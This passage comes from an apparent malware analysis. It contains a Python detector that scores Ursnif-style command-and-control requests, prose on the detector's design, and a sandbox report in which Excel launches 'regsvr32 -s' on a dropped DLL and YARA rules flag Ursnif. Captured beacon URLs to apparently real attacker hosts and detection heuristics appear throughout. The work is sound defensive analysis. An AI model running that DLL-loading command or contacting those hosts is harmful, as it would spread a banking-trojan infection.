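HARDCODED_HEADERS: Dict[str, str] = {
    "Cache-Control": "no-cache",
    "Connection": "Keep-Alive",
    "Pragma": "no-cache",
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)",
}

Request = Tuple[str, str, Dict[str, str]]  # (host, path, headers)
CAPTURED: List[Request] = [
    ("app.bighomegl.at", "/8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F", BROWSER_HEADERS),
    ("authd.feronok.com", "/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ", BROWSER_HEADERS),
    ("app.bighomegl.at", "/1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6", HARDCODED_HEADERS),
]
# Constructed control request (not from the report): an ordinary static asset.
CONTROL: Request = ("www.example.com", "/images/logo.png", BROWSER_HEADERS)

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")


def fold_path(path: str) -> str:
    """Drop the slashes first, then map _2B/_2F back to '+' and '/'.
    The order matters: in the capture a token can straddle a slash
    ("...kSBqmc5Fyr_/2B3bae..."), so substituting per segment would miss it."""
    return path.replace("/", "").replace("_2B", "+").replace("_2F", "/")


def analyse(req: Request) -> Dict[str, object]:
    host, path, headers = req
    flat = path.replace("/", "")
    return {
        "host": host,
        "path_len": len(path),
        "segments": len([s for s in path.split("/") if s]),
        "tokens": flat.count("_2B") + flat.count("_2F"),
        "looks_b64": bool(B64_ALPHABET.match(fold_path(path))),
        "browser_like": "Accept" in headers and "Accept-Language" in headers,
        "hardcoded_ua": "MSIE" in headers.get("User-Agent", "") and "Accept" not in headers,
    }


def score(f: Dict[str, object]) -> int:
    """Additive score; 3 or more is worth an analyst's look (thresholds are the author's)."""
    s = 0
    if f["looks_b64"] and f["segments"] >= 8:
        s += 2  # a deep "directory tree" consisting only of base64 characters
    if f["path_len"] >= 150:
        s += 1
    if f["tokens"] >= 1:
        s += 1  # _2B/_2F stand-ins for '+' and '/' (URL-encoding with '_' for '%')
    if f["hardcoded_ua"]:
        s += 1  # MSIE UA without Accept headers is not a browser navigation
    return s


def suspicious(req: Request) -> bool:
    return score(analyse(req)) >= 3


if __name__ == "__main__":
    for req in CAPTURED + [CONTROL]:
        f = analyse(req)
        print(f"{req[0]:<18} score={score(f)} segments={f['segments']:>2} "
              f"len={f['path_len']:>3} hardcoded_ua={f['hardcoded_ua']}")
```

The fold step is the part worth copying into a real detector: splitting the URL into segments and substituting per segment misses tokens that the slash insertion has cut in half, which happens twice in the requests above. The header features are deliberately kept separate from the path features, because the same C2 traffic shows up with either a genuine browser header set (injected into iexplore.exe) or the hard-coded one.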


HTTPS Packets

Jun 11, 2021 05:06:40.844886065 CEST | Source 50.87.220.158:443 -> Destination 192.168.2.3:49714
    Certificates (Subject / Issuer / Not Before / Not After):
        Subject: CN=www.quickbooks.aeymotors.com
            Issuer: CN=R3, O=Let's Encrypt, C=US
            Not Before: Wed Apr 14 11:12:56 CEST 2021 | Not After: Tue Jul 13 11:12:56 CEST 2021
        Subject: CN=R3, O=Let's Encrypt, C=US
            Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
            Not Before: Wed Oct 07 21:21:40 CEST 2020 | Not After: Wed Sep 29 21:21:40 CEST 2021
    JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
    JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 05:06:36
Start date: 11/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x310000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 05:06:42
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s C:/Users/Public/SettingSyncY.dll
Imagebase: 0xa40000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 05:07:32
Start date: 11/06/2021
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff693900000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 05:07:33
Start date: 11/06/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
Imagebase: 0x170000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 05:08:17
Start date: 11/06/2021
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff693900000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:40
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:41
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:03
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:04
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis
